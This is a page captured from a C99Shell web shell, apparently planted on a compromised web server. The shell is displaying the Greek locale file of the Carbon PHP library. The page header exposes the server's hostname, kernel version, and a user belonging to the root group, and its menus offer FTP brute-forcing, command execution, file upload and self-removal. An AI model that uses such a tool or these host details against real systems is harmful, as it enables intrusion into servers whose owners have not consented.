!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/multirest.picotech.app/public_html/vendor/nesbot/carbon/src/Carbon/Lang/   drwxr-xr-x
Free 28.56 GB of 117.98 GB (24.21%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     el.php (3.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This file is part of the Carbon package.
 *
 * (c) Brian Nesbitt <brian@nesbot.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

/*
 * Authors:
 * - Alessandro Di Felice
 * - François B
 * - Tim Fish
 * - Gabriel Monteagudo
 * - JD Isaacks
 * - yiannisdesp
 * - Ilias Kasmeridis (iliaskasm)
 */

use Carbon\CarbonInterface;

return [
    
'year' => ':count χρόνος|:count χρόνια',
    
'a_year' => 'ένας χρόνος|:count χρόνια',
    
'y' => ':count χρ.',
    
'month' => ':count μήνας|:count μήνες',
    
'a_month' => 'ένας μήνας|:count μήνες',
    
'm' => ':count μήν.',
    
'week' => ':count εβδομάδα|:count εβδομάδες',
    
'a_week' => 'μια εβδομάδα|:count εβδομάδες',
    
'w' => ':count εβδ.',
    
'day' => ':count μέρα|:count μέρες',
    
'a_day' => 'μία μέρα|:count μέρες',
    
'd' => ':count μέρ.',
    
'hour' => ':count ώρα|:count ώρες',
    
'a_hour' => 'μία ώρα|:count ώρες',
    
'h' => ':count ώρα|:count ώρες',
    
'minute' => ':count λεπτό|:count λεπτά',
    
'a_minute' => 'ένα λεπτό|:count λεπτά',
    
'min' => ':count λεπ.',
    
'second' => ':count δευτερόλεπτο|:count δευτερόλεπτα',
    
'a_second' => 'λίγα δευτερόλεπτα|:count δευτερόλεπτα',
    
's' => ':count δευ.',
    
'ago' => 'πριν :time',
    
'from_now' => 'σε :time',
    
'after' => ':time μετά',
    
'before' => ':time πριν',
    
'diff_now' => 'τώρα',
    
'diff_today' => 'Σήμερα',
    
'diff_today_regexp' => 'Σήμερα(?:\\s+{})?',
    
'diff_yesterday' => 'χθες',
    
'diff_yesterday_regexp' => 'Χθες(?:\\s+{})?',
    
'diff_tomorrow' => 'αύριο',
    
'diff_tomorrow_regexp' => 'Αύριο(?:\\s+{})?',
    
'formats' => [
        
'LT' => 'h:mm A',
        
'LTS' => 'h:mm:ss A',
        
'L' => 'DD/MM/YYYY',
        
'LL' => 'D MMMM YYYY',
        
'LLL' => 'D MMMM YYYY h:mm A',
        
'LLLL' => 'dddd, D MMMM YYYY h:mm A',
    ],
    
'calendar' => [
        
'sameDay' => '[Σήμερα {}] LT',
        
'nextDay' => '[Αύριο {}] LT',
        
'nextWeek' => 'dddd [{}] LT',
        
'lastDay' => '[Χθες {}] LT',
        
'lastWeek' => function (CarbonInterface $current) {
            switch (
$current->dayOfWeek) {
                case 
6:
                    return 
'[το προηγούμενο] dddd [{}] LT';
                default:
                    return 
'[την προηγούμενη] dddd [{}] LT';
            }
        },
        
'sameElse' => 'L',
    ],
    
'ordinal' => ':numberη',
    
'meridiem' => ['ΠΜ''ΜΜ''πμ''μμ'],
    
'months' => ['Ιανουαρίου''Φεβρουαρίου''Μαρτίου''Απριλίου''Μαΐου''Ιουνίου''Ιουλίου''Αυγούστου''Σεπτεμβρίου''Οκτωβρίου''Νοεμβρίου''Δεκεμβρίου'],
    
'months_standalone' => ['Ιανουάριος''Φεβρουάριος''Μάρτιος''Απρίλιος''Μάιος''Ιούνιος''Ιούλιος''Αύγουστος''Σεπτέμβριος''Οκτώβριος''Νοέμβριος''Δεκέμβριος'],
    
'months_regexp' => '/(D[oD]?[\s,]+MMMM|L{2,4}|l{2,4})/',
    
'months_short' => ['Ιαν''Φεβ''Μαρ''Απρ''Μαϊ''Ιουν''Ιουλ''Αυγ''Σεπ''Οκτ''Νοε''Δεκ'],
    
'weekdays' => ['Κυριακή''Δευτέρα''Τρίτη''Τετάρτη''Πέμπτη''Παρασκευή''Σάββατο'],
    
'weekdays_short' => ['Κυρ''Δευ''Τρι''Τετ''Πεμ''Παρ''Σαβ'],
    
'weekdays_min' => ['Κυ''Δε''Τρ''Τε''Πε''Πα''Σα'],
    
'first_day_of_week' => 1,
    
'day_of_first_week_of_year' => 4,
    
'list' => [', '' και '],
];

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0038 ]--